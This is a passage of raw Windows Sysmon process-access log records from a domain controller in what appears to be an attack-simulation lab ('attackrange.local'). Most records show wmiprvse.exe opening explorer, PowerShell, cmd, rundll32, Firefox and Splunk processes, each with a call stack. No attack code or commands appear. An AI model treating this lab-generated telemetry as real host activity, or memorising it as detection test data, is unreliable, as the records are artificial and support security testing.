32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program 